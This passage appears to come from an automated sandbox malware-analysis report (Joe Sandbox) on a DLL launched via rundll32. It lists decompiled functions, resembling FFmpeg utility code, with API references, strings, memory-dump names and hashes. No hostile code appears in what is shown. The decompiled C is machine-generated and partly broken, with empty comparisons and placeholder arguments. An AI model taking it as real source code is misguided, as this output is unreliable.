mv_hwframe_get_buffer.F086(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E6EA

Part of subcall function 1001E690: mv_hwframe_map.F086(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E70C
Part of subcall function 1001E690: mv_log.F086 ref: 1001E736
Part of subcall function 1001E690: mv_frame_free.F086 ref: 1001E742

mv_buffer_ref.F086(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E6B7

Part of subcall function 10009FC0: mv_mallocz.F086 ref: 10009FD2

mv_buffer_ref.F086(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E773

Strings

Failed to map frame into derived frame context: %d., xrefs: 1001E71D

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_ref$mv_frame_allocmv_frame_freemv_hwframe_get_buffermv_hwframe_mapmv_logmv_mallocmv_mallocz
String ID: Failed to map frame into derived frame context: %d.
API String ID: 2770197599-2491951210
Opcode ID: 9c42f20b11d269895efbb2d602614c3a18f3d43235624fe558127838406e54b0
Instruction ID: c8a7df340d6dcafb776f8cd3ae8b96b8e9686aa7a819e798d3a2729e9b2e2ff4
Opcode Fuzzy Hash: 9c42f20b11d269895efbb2d602614c3a18f3d43235624fe558127838406e54b0
Instruction Fuzzy Hash: 6541E5786097418FE740DF29D58095FBBE0FF88350F05896DE8998B355E734E8818B82

Uniqueness

Uniqueness Score: -1.00%

Function 100312C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 100312D8
strcmp.MSVCRT ref: 100312F0
strcmp.MSVCRT ref: 10031308
strcmp.MSVCRT ref: 10031320
strcmp.MSVCRT ref: 10031338
strcmp.MSVCRT ref: 10031350
strcmp.MSVCRT ref: 10031368
strcmp.MSVCRT ref: 10031380
mv_parse_ratio.F086(?,?,?,?,?,?,?,?,1002E89B), ref: 100313AC

Part of subcall function 100310F0: mv_expr_parse_and_eval.F086 ref: 10031179
Part of subcall function 100310F0: mv_d2q.F086 ref: 10031195

Strings

ntsc, xrefs: 100312C5

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strcmp$mv_d2qmv_expr_parse_and_evalmv_parse_ratio
String ID: ntsc
API String ID: 2874497773-2045543799
Opcode ID: ec32bec2af6a2ecb4ce6168838176d8fdb98f1596f88ccec490d531f44d5e481
Instruction ID: a2e0eae1ca3038ae62bde4675692c4f594c3c7e77de8ac1c76987ebdc5f5f10b
Opcode Fuzzy Hash: ec32bec2af6a2ecb4ce6168838176d8fdb98f1596f88ccec490d531f44d5e481
Instruction Fuzzy Hash: 9A317E74A09341DFD351DF6AC54029FB6F4EF48781F41882EB989CB650E7B8EA80DB52

Uniqueness

Uniqueness Score: -1.00%

Function 10092440 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 209
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10092440() {
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				void* _t90;
				signed int _t91;
				void* _t97;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t125;
				signed int _t126;
				signed int _t128;
				char* _t129;
				void* _t131;
				signed int* _t132;

				_t132 = _t131 - 0x3c;
				_t125 = _t132[0x14];
				if(_t132[0x15] != 0) {
					_t63 = _t132[0x15];
					 *_t63 = _t125;
				}
				if(_t132[0x16] == 1) {
					L29:
					L100A0678();
					 *_t63 = 0x21;
					goto L30;
				} else {
					if(_t132[0x16] <= 0x24) {
						while(1) {
							_t65 =  *_t125;
							 *_t132 = _t65;
							_t87 = _t65;
							L100A0738();
							if(_t65 == 0) {
								break;
							}
							_t125 = _t125 + 1;
						}
						_t120 = _t87;
						_t88 = _t65;
						_t6 = _t120 - 0x2b; // -43
						_t66 = _t120;
						if((_t6 & 0x000000fd) == 0) {
							_t66 =  *(_t125 + 1) & 0x000000ff;
							_t125 = _t125 + 1;
						}
						if(_t132[0x16] != 0) {
							if(_t132[0x16] != 0x10 || _t66 != 0x30) {
								goto L11;
							} else {
								if(( *(_t125 + 1) & 0xdf) == 0x58) {
									goto L34;
								} else {
									_t132[9] = 0x10;
									_t129 = _t125 + 1;
									_t68 = 0;
									goto L16;
								}
							}
						} else {
							_t132[0x16] = 0xa;
							if(_t66 == 0x30) {
								if(( *(_t125 + 1) & 0xdf) != 0x58) {
									_t132[9] = 8;
									_t132[0x16] = 8;
									goto L45;
								} else {
									L34:
									_t66 =  *(_t125 + 2) & 0x000000ff;
									_t132[0x16] = 0x10;
									_t125 = _t125 + 2;
									goto L11;
								}
							} else {
								L11:
								_t128 = _t66;
								if(_t128 - 0x30 <= 9) {
									_t132[9] = _t132[0x16];
									L45:
									_t68 = _t66 - 0x30;
									goto L15;
								} else {
									 *_t132 = _t128;
									L100A0740();
									if(_t66 != 0) {
										_t68 = _t128 - 0x37;
										_t132[9] = _t132[0x16];
										goto L15;
									} else {
										 *_t132 = _t128;
										L100A0730();
										if(_t66 == 0) {
											L30:
											_t64 = 0;
											goto L31;
										} else {
											_t68 = _t128 - 0x57;
											_t132[9] = _t132[0x16];
											L15:
											_t129 = _t125 + 1;
											if(_t68 >= _t132[9]) {
												goto L30;
											} else {
												L16:
												_t69 = _t132[0x16];
												_t132[0xa] = _t88;
												_t126 = _t68;
												_t132[6] = _t69;
												_t132[7] = _t69 >> 0x1f;
												_t71 = _t120;
												_t121 = _t68 >> 0x1f;
												_t132[0xb] = _t71;
												while(1) {
													_t89 =  *_t129;
													_t35 = _t89 - 0x30; // -96
													_t97 = _t35;
													if(_t97 <= 9) {
														goto L17;
													}
													 *_t132 = _t89;
													L100A0740();
													if(_t71 == 0) {
														 *_t132 = _t89;
														L100A0730();
														if(_t71 != 0) {
															_t90 = _t89 - 0x57;
															goto L18;
														}
													} else {
														_t90 = _t89 - 0x37;
														L18:
														if(_t90 < _t132[9]) {
															 *_t132 = 0xffffffff;
															_t132[1] = 0x7fffffff;
															_t132[2] = _t132[6];
															_t132[3] = _t132[7];
															_t71 = L10091900() + 2;
															asm("adc edx, 0x0");
															asm("sbb edx, edi");
															if(_t71 < _t126) {
																_t132[0xa] = 1;
															} else {
																_t84 = _t126;
																_t71 = _t84 * _t132[0x16];
																_t121 = (_t84 * _t132[0x16] >> 0x20) + _t132[7] * _t126 + _t132[0x16] * _t121;
																_t126 = _t71 + _t90;
																asm("adc edi, ebx");
															}
															_t129 = _t129 + 1;
															continue;
														}
													}
													_t91 = _t132[0xa];
													_t132[7] = _t121;
													_t132[6] = _t126;
													_t122 = _t132[0xb] & 0x000000ff;
													if(_t132[0x15] != 0) {
														 *(_t132[0x15]) = _t129;
													}
													if(_t122 == 0x2d) {
														asm("sbb eax, ebp");
														if(0 < _t132[6] || _t91 != 0) {
															L100A0678();
															 *0x80000000 = 0x22;
															_t64 = 0;
														} else {
															_t64 =  ~(_t132[6]);
															asm("adc edx, 0x0");
														}
														goto L31;
													} else {
														_t64 = _t132[6];
														if(_t132[7] < 0 || _t91 != 0) {
															L100A0678();
															 *_t64 = 0x22;
															return 0xffffffff;
														} else {
															L31:
															return _t64;
														}
													}
													goto L51;
													L17:
													_t90 = _t97;
													goto L18;
												}
											}
										}
									}
								}
							}
						}
					} else {
						goto L29;
					}
				}
				L51:
			}

0x10092444
0x1009244b
0x10092451
0x10092453
0x10092457
0x10092457
0x1009245e
0x100925f0
0x100925f0
0x100925f5
0x00000000
0x10092464
0x10092469
0x10092473
0x10092473
0x10092476
0x10092479
0x1009247b
0x10092482
0x00000000
0x00000000
0x10092470
0x10092470
0x10092484
0x10092486
0x10092488
0x1009248b
0x10092493
0x10092495
0x10092499
0x10092499
0x100924a2
0x100925c5
0x00000000
0x100925d3
0x100925dc
0x00000000
0x100925de
0x100925de
0x100925e6
0x100925e9
0x00000000
0x100925e9
0x100925dc
0x100924a8
0x100924a8
0x100924b2
0x1009262a
0x10092718
0x10092720
0x00000000
0x10092630
0x10092630
0x10092630
0x10092634
0x1009263c
0x00000000
0x1009263c
0x100924b8
0x100924b8
0x100924b8
0x100924c1
0x100926d4
0x100926d8
0x100926db
0x00000000
0x100924c7
0x100924c7
0x100924ca
0x100924d1
0x10092614
0x10092617
0x00000000
0x100924d7
0x100924d7
0x100924da
0x100924e1
0x100925fb
0x100925fb
0x00000000
0x100924e7
0x100924eb
0x100924ee
0x100924f8
0x100924fc
0x10092501
0x00000000
0x10092507
0x10092507
0x1009250b
0x1009250f
0x10092516
0x10092518
0x1009251f
0x10092523
0x10092525
0x10092527
0x1009259a
0x1009259a
0x1009259e
0x1009259e
0x100925a4
0x00000000
0x00000000
0x100925a6
0x100925a9
0x100925b0
0x10092658
0x1009265b
0x10092662
0x100926c0
0x00000000
0x100926c0
0x100925b6
0x100925b6
0x10092532
0x10092538
0x10092546
0x1009254d
0x10092555
0x10092559
0x10092562
0x10092565
0x1009256a
0x1009256c
0x10092648
0x10092572
0x10092582
0x10092584
0x1009258c
0x10092593
0x10092595
0x10092595
0x10092597
0x00000000
0x10092597
0x10092538
0x10092668
0x1009266c
0x10092670
0x10092674
0x1009267b
0x10092681
0x10092681
0x10092687
0x100926f9
0x100926fb
0x10092701
0x1009270b
0x10092711
0x1009272a
0x10092732
0x10092734
0x10092737
0x00000000
0x10092689
0x1009268d
0x10092693
0x1009269d
0x100926a7
0x100926b9
0x100925ff
0x100925ff
0x10092606
0x10092606
0x10092693
0x00000000
0x10092530
0x10092530
0x00000000
0x10092530
0x1009259a
0x10092501
0x100924e1
0x100924d1
0x100924c1
0x100924b2
0x1009246b
0x00000000
0x1009246b
0x10092469
0x00000000

APIs

isspace.MSVCRT ref: 1009247B
isupper.MSVCRT ref: 100924CA
islower.MSVCRT ref: 100924DA
isupper.MSVCRT ref: 100925A9
_errno.MSVCRT ref: 100925F0

Strings

$, xrefs: 10092464

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: isupper$_errnoislowerisspace
String ID: $
API String ID: 4095548146-3993045852
Opcode ID: 86157aabf5dcf11647465d89481f5db1467bac492865d6203d8e1a1173ce975d
Instruction ID: bf1127f437a700fe79d2786272533d695bbcf864f17e232e7603132a75f37682
Opcode Fuzzy Hash: 86157aabf5dcf11647465d89481f5db1467bac492865d6203d8e1a1173ce975d
Instruction Fuzzy Hash: A171A0746087868FC300CF68C88065EFBE2EFC9394F15492DF8998B791E674D845AB82

Uniqueness

Uniqueness Score: -1.00%

Function 10026169 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178
stringCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E10026169(void* __edi, signed char* __ebp, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, unsigned int _a36, intOrPtr _a40, intOrPtr _a44, char _a48, signed char* _a1072, signed char* _a2096, signed char* _a3120, signed char* _a4144, intOrPtr _a4148, intOrPtr _a4152, signed int _a5204, char* _a5208, char* _a5212) {
				signed int _t63;
				signed int _t67;
				signed int _t70;
				signed int _t73;
				signed int _t76;
				signed int _t81;
				void* _t84;
				signed char* _t85;
				int _t87;
				signed char* _t88;
				intOrPtr _t92;
				signed char* _t93;
				char* _t102;
				signed char* _t103;
				signed char* _t104;
				signed char* _t105;
				signed char* _t106;
				char* _t107;
				char* _t122;
				signed int _t123;
				char* _t125;
				signed char* _t130;
				signed char** _t132;

				_t130 = __ebp;
				if(( *0x100d76ac & 0x00000002) != 0) {
					_t51 = _a5204 + 8; // 0x101
					__edx = _t51;
					__eax = 0x100b6d3b;
					if(__edx <= 0x40) {
						__eax =  *((intOrPtr*)(0x100b6f40 + __edx * 4));
					}
					_a8 = __eax;
					__eax = "[%s] ";
					_a4 = "[%s] ";
					 *__esp = __edi;
					__eax = L100089C0();
				}
				 *_t132 = _t130;
				_a8 = _a5212;
				_a4 = _a5208;
				L10008B70();
				_t107 = _a1072;
				_t102 = _a2096;
				_t122 = _a3120;
				_t125 = _a4144;
				if( *_t107 != 0 ||  *_t102 != 0 ||  *_t122 != 0 ||  *_t125 != 0) {
					_t92 = _a4148;
					_t63 = 0;
					if(_t92 != 0 && _a4152 >= _t92) {
						_t63 = (0 | ( *(_t125 + _t92 - 1) & 0x000000ff) == 0x0000000a |  *(_t125 + _t92 - 1) & 0 | ( *(_t125 + _t92 - 1) & 0x000000ff) == 0x0000000d) & 0x000000ff;
					}
					 *0x100ad00c = _t63;
				}
				_a24 = _t125;
				_t93 =  &_a48;
				_a8 = "%s%s%s%s";
				_a20 = _t122;
				_a16 = _t102;
				_a12 = _t107;
				_a4 = 0x400;
				 *_t132 = _t93;
				L10025AE0();
				_t67 =  *0x100d76a0;
				if(_t67 == 0) {
					 *_t132 = 2;
					L100A0860();
					asm("sbb eax, eax");
					 *0x100d76a0 = _t67 | 0x00000001;
				}
				_t123 =  *0x100ad00c; // 0x1
				_t126 =  *0x100d7280;
				if(_t123 == 0 || ( *0x100d76ac & 0x00000001) == 0) {
					L12:
					if(_t126 > 0) {
						 *_t132 = 2;
						_t123 = 0;
						_t85 =  *0x100ad0cc();
						_a8 = _t126;
						_t126 = "    Last message repeated %d times\n";
						_a4 = "    Last message repeated %d times\n";
						 *_t132 = _t85;
						E10025610();
						 *0x100d7280 = 0;
					}
					_a4 = _t93;
					 *_t132 = 0x100d72a0;
					strcpy(??, ??);
					_t103 = _a1072;
					_t70 =  *_t103 & 0x000000ff;
					if(_t70 == 0) {
						L20:
						L100257B0(_a40, _t93, _t103, 0, _t123, _t126);
						_t104 = _a2096;
						_t73 =  *_t104 & 0x000000ff;
						if(_t73 == 0) {
							L26:
							L100257B0(_a44, _t93, _t104, 0, _t123, _t126);
							_t105 = _a3120;
							_t76 =  *_t105 & 0x000000ff;
							if(_t76 == 0) {
								L32:
								_t128 = _a36 >> 8;
								_t96 =  >  ? 7 : _a5204 >> 3;
								_t97 =  <  ? 0 :  >  ? 7 : _a5204 >> 3;
								L100257B0( <  ? 0 :  >  ? 7 : _a5204 >> 3,  <  ? 0 :  >  ? 7 : _a5204 >> 3, _t105, _a36 >> 8, _t123, _a36 >> 8);
								_t106 = _a4144;
								_t81 =  *_t106 & 0x000000ff;
								if(_t81 == 0) {
									L38:
									L100257B0(_t97, _t97, _t106, _t128, _t123, _t128);
									goto L39;
								}
								L34:
								while(_t81 - 0xe > 0x11 && _t81 > 7) {
									_t81 = _t106[1] & 0x000000ff;
									_t106 =  &(_t106[1]);
									if(_t81 != 0) {
										continue;
									}
									L37:
									_t106 = _a4144;
									goto L38;
								}
								 *_t106 = 0x3f;
								_t106 =  &(_t106[1]);
								_t81 =  *_t106 & 0x000000ff;
								if(_t81 != 0) {
									goto L34;
								}
								goto L37;
							}
							L28:
							while(_t76 - 0xe > 0x11 && _t76 > 7) {
								_t76 = _t105[1] & 0x000000ff;
								_t105 =  &(_t105[1]);
								if(_t76 != 0) {
									continue;
								}
								L31:
								_t105 = _a3120;
								goto L32;
							}
							 *_t105 = 0x3f;
							_t105 =  &(_t105[1]);
							_t76 =  *_t105 & 0x000000ff;
							if(_t76 != 0) {
								goto L28;
							}
							goto L31;
						}
						L22:
						while(_t73 - 0xe > 0x11 && _t73 > 7) {
							_t73 = _t104[1] & 0x000000ff;
							_t104 =  &(_t104[1]);
							if(_t73 != 0) {
								continue;
							}
							L25:
							_t104 = _a2096;
							goto L26;
						}
						 *_t104 = 0x3f;
						_t104 =  &(_t104[1]);
						_t73 =  *_t104 & 0x000000ff;
						if(_t73 != 0) {
							goto L22;
						}
						goto L25;
					} else {
						L16:
						while(_t70 - 0xe > 0x11 && _t70 > 7) {
							_t70 = _t103[1] & 0x000000ff;
							_t103 =  &(_t103[1]);
							if(_t70 != 0) {
								continue;
							}
							L19:
							_t103 = _a1072;
							goto L20;
						}
						 *_t103 = 0x3f;
						_t103 =  &(_t103[1]);
						_t70 =  *_t103 & 0x000000ff;
						if(_t70 != 0) {
							goto L16;
						}
						goto L19;
					}
				} else {
					 *_t132 = _t93;
					_t106 = 0x100d72a0;
					_a4 = 0x100d72a0;
					_t87 = strcmp(??, ??);
					if(_t87 != 0) {
						goto L12;
					}
					if(_a48 != 0) {
						 *_t132 = _t93;
						L100A07D8();
						if( *((char*)(_t132 + _t87 + 0x2f)) == 0xd) {
							goto L12;
						}
						_t128 =  &(_t126[1]);
						 *0x100d7280 = _t128;
						if( *0x100d76a0 == 1) {
							 *_t132 = 2;
							_t88 =  *0x100ad0cc();
							_a8 = _t128;
							_a4 = "    Last message repeated %d times\r";
							 *_t132 = _t88;
							E10025610();
						}
						L39:
						 *_t132 = _t130;
						_a4 = 0;
						_t84 = E10009690(0, _t106, _t123, _t128);
						 *_t132 = 0x100d76b0;
						L100A0978();
						return _t84;
					}
					goto L12;
				}
			}

0x10026169
0x10026177
0x10026184
0x10026184
0x10026187
0x1002618f
0x100261be
0x100261be
0x10026191
0x10026195
0x1002619a
0x1002619e
0x100261a1
0x100261a1
0x10025d94
0x10025d9e
0x10025da9
0x10025dad
0x10025db2
0x10025db9
0x10025dc0
0x10025dc7
0x10025dd1
0x10026010
0x10026017
0x1002601b
0x10026039
0x10026039
0x1002603c
0x1002603c
0x10025e00
0x10025e04
0x10025e0d
0x10025e16
0x10025e1a
0x10025e1e
0x10025e22
0x10025e26
0x10025e29
0x10025e2e
0x10025e35
0x100260b0
0x100260b7
0x100260bf
0x100260c4
0x100260c4
0x10025e3b
0x10025e41
0x10025e49
0x10025e80
0x10025e82
0x10025e84
0x10025e8b
0x10025e8d
0x10025e93
0x10025e97
0x10025e9c
0x10025ea0
0x10025ea3
0x10025ea8
0x10025ea8
0x10025eae
0x10025eb2
0x10025eb9
0x10025ebe
0x10025ec5
0x10025eca
0x10025ef6
0x10025efc
0x10025f01
0x10025f08
0x10025f0d
0x10025f36
0x10025f3c
0x10025f41
0x10025f48
0x10025f4d
0x10025f76
0x10025f89
0x10025f8e
0x10025f97
0x10025f9c
0x10025fa1
0x10025fa8
0x10025fad
0x10025fd6
0x10025fda
0x00000000
0x10025fda
0x00000000
0x10025fb0
0x10025fc6
0x10025fca
0x10025fcd
0x00000000
0x00000000
0x10025fcf
0x10025fcf
0x00000000
0x10025fcf
0x10026068
0x1002606b
0x1002606c
0x10026071
0x00000000
0x00000000
0x00000000
0x10026077
0x00000000
0x10025f50
0x10025f66
0x10025f6a
0x10025f6d
0x00000000
0x00000000
0x10025f6f
0x10025f6f
0x00000000
0x10025f6f
0x10026050
0x10026053
0x10026054
0x10026059
0x00000000
0x00000000
0x00000000
0x1002605f
0x00000000
0x10025f10
0x10025f26
0x10025f2a
0x10025f2d
0x00000000
0x00000000
0x10025f2f
0x10025f2f
0x00000000
0x10025f2f
0x10026080
0x10026083
0x10026084
0x10026089
0x00000000
0x00000000
0x00000000
0x10025ed0
0x00000000
0x10025ed0
0x10025ee6
0x10025eea
0x10025eed
0x00000000
0x00000000
0x10025eef
0x10025eef
0x00000000
0x10025eef
0x10026098
0x1002609b
0x1002609c
0x100260a1
0x00000000
0x00000000
0x00000000
0x100260a7
0x10025e54
0x10025e54
0x10025e57
0x10025e5c
0x10025e60
0x10025e67
0x00000000
0x00000000
0x10025e6e
0x100261c7
0x100261ca
0x100261d4
0x00000000
0x00000000
0x100261da
0x100261e2
0x100261e8
0x100261ee
0x100261f5
0x10026200
0x10026204
0x10026208
0x1002620b
0x1002620b
0x10025fdf
0x10025fdf
0x10025fe4
0x10025fe8
0x10025fed
0x10025ff4
0x10026006
0x10026006
0x00000000
0x10025e6e

APIs

mv_vbprintf.F086 ref: 10025DAD
strcmp.MSVCRT ref: 10025E60
strcpy.MSVCRT ref: 10025EB9
mv_bprint_finalize.F086 ref: 10025FE8
ReleaseSRWLockExclusive.KERNEL32 ref: 10025FF4
mv_bprintf.F086 ref: 100261A1

Strings

Last message repeated %d times, xrefs: 10025E97
%s%s%s%s, xrefs: 10025E08
[%s] , xrefs: 10026195

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExclusiveLockReleasemv_bprint_finalizemv_bprintfmv_vbprintfstrcmpstrcpy
String ID: Last message repeated %d times$%s%s%s%s$[%s]
API String ID: 4275616186-1378087399
Opcode ID: 92fe572d3c91f27e652c46d7d51aebd23f6a1e44d33db3be991a07085aa6e5fb
Instruction ID: d1eb8843b360d500b767063b44c9564666ae391a763e2864b4dfe10f501dd800
Opcode Fuzzy Hash: 92fe572d3c91f27e652c46d7d51aebd23f6a1e44d33db3be991a07085aa6e5fb
Instruction Fuzzy Hash: B661C0749093C18FD720CF24D8807AABBE2FF85344F85885EE8CA57342D736A945DB82

Uniqueness

Uniqueness Score: -1.00%

Function 10009130 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 272
stringCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E10009130() {
				int _t86;
				void* _t91;
				void* _t93;
				signed char _t99;
				void* _t111;
				signed char _t113;
				void* _t114;
				void* _t118;
				signed char _t119;
				void* _t121;
				int _t122;
				void* _t123;
				unsigned int _t124;
				unsigned int _t125;
				signed int _t126;
				void* _t130;
				void* _t131;
				int _t132;
				void* _t136;
				signed char _t139;
				signed char _t141;
				void* _t142;
				void* _t143;
				signed int _t144;
				int _t145;
				void* _t147;
				signed int _t148;
				signed int _t151;
				int _t153;
				signed int _t154;
				void _t158;
				void* _t159;
				char* _t161;
				void** _t162;
				void* _t165;
				void* _t166;
				void** _t167;
				void*** _t168;

				_t86 = _t168[0x111];
				_t167 = _t168[0x110];
				if( *_t86 == 0) {
					L40:
					return _t86;
				} else {
					_t118 = _t167[2];
					while(1) {
						_t145 = _t167[1];
						_t88 =  <=  ? _t145 : _t118;
						_t121 = _t118 - ( <=  ? _t145 : _t118);
						if(_t121 != 0) {
							goto L15;
						}
						 *_t168 = _t168[0x111];
						_t9 = strlen(??) + 1; // 0x1
						_t159 = _t9;
						L11:
						_t124 = _t167[3];
						if(_t124 == _t118 || _t145 >= _t118) {
							L22:
							_t95 =  <=  ? _t118 : _t145;
							_t119 = _t118 - ( <=  ? _t118 : _t145);
							if(_t119 > 0x3ff) {
								L26:
								_t139 = _t119;
								_t147 =  *_t167 + _t145;
								if(_t119 >= 8) {
									if((_t147 & 0x00000001) != 0) {
										 *_t147 = 0x21;
										_t139 = _t119 - 1;
										_t147 = _t147 + 1;
									}
									if((_t147 & 0x00000002) != 0) {
										 *_t147 = 0x2121;
										_t139 = _t139 - 2;
										_t147 = _t147 + 2;
									}
									if((_t147 & 0x00000004) != 0) {
										 *_t147 = 0x21212121;
										_t139 = _t139 - 4;
										_t147 = _t147 + 4;
									}
									_t125 = _t139;
									_t139 = _t139 & 0x00000003;
									_t126 = _t125 >> 2;
									memset(_t147, 0x21212121, _t126 << 2);
									_t168 =  &(_t168[3]);
									_t147 = _t147 + _t126;
									if((_t139 & 0x00000004) == 0) {
										goto L29;
									} else {
										goto L28;
									}
									goto L40;
								} else {
									if((_t139 & 0x00000004) != 0) {
										L28:
										 *_t147 = 0x21212121;
										_t147 = _t147 + 4;
									}
								}
								L29:
								if((_t139 & 0x00000002) != 0) {
									 *_t147 = 0x2121;
									_t147 = _t147 + 2;
								}
								if((_t139 & 0x00000001) != 0) {
									 *_t147 = 0x21;
								}
								_t161 = "[truncated strftime output]";
								_t99 =  <=  ? _t119 : 0x1b;
								_t141 =  *_t167 + _t167[1];
								if(0x1b >= 4) {
									if((_t141 & 0x00000001) != 0) {
										_t141 = _t141 + 1;
										_t161 = "truncated strftime output]";
										_t99 = _t99 - 1;
										 *((char*)(_t141 - 1)) = "[truncated strftime output]" & 0x000000ff;
									}
									if((_t141 & 0x00000002) != 0) {
										_t148 =  *_t161 & 0x0000ffff;
										_t141 = _t141 + 2;
										_t161 =  &(_t161[2]);
										_t99 = _t99 - 2;
										 *(_t141 - 2) = _t148;
									}
									if(_t99 >= 4) {
										_t168[7] = _t99;
										_t131 = 0;
										_t151 = _t99 & 0xfffffffc;
										do {
											 *(_t141 + _t131) = _t161[_t131];
											_t131 = _t131 + 4;
										} while (_t131 < _t151);
										_t99 = _t168[7];
										_t141 = _t141 + _t131;
										_t161 =  &(_t161[_t131]);
									}
								}
								_t130 = 0;
								if((_t99 & 0x00000002) != 0) {
									_t130 = 2;
									 *_t141 =  *_t161 & 0x0000ffff;
								}
								if((_t99 & 0x00000001) != 0) {
									 *((char*)(_t141 + _t130)) = _t161[_t130] & 0x000000ff;
								}
								_t142 = _t167[1];
								_t102 =  >  ? _t119 : 0xfffffffa - _t142;
								_t86 = ( >  ? _t119 : 0xfffffffa - _t142) + _t142;
								_t136 = _t167[2];
								_t167[1] = 0xfffffffa;
								if(_t136 != 0) {
									L39:
									_t138 =  >  ? _t86 : _t136 - 1;
									_t93 =  *_t167;
									 *((char*)(_t93 + ( >  ? _t86 : _t136 - 1))) = 0;
									return _t93;
								}
								goto L40;
							} else {
								_t162 =  &(_t168[8]);
								 *_t168 = _t162;
								_t168[3] = _t168[0x112];
								_t168[2] = _t168[0x111];
								_t86 = 0x400;
								_t168[1] = 0x400;
								L100A07D0();
								if(0x400 != 0) {
									_t168[2] = _t162;
									_t168[1] = 0x100af500;
									 *_t168 = _t167;
									return L100089C0();
								} else {
									if(_t119 != 0) {
										_t145 = _t167[1];
										goto L26;
									}
									goto L40;
								}
							}
						} else {
							_t110 =  >  ? _t159 : 0xfffffffe - _t145;
							_t111 = _t145 + ( >  ? _t159 : 0xfffffffe - _t145) + 1;
							if(_t124 >> 1 >= _t118) {
								_t118 = _t118 + _t118;
							} else {
								_t118 = _t124;
							}
							if(_t118 < _t111) {
								_t115 =  <=  ? _t124 : _t111;
								_t118 =  <=  ? _t124 : _t111;
							}
							_t165 =  *_t167;
							_t168[1] = _t118;
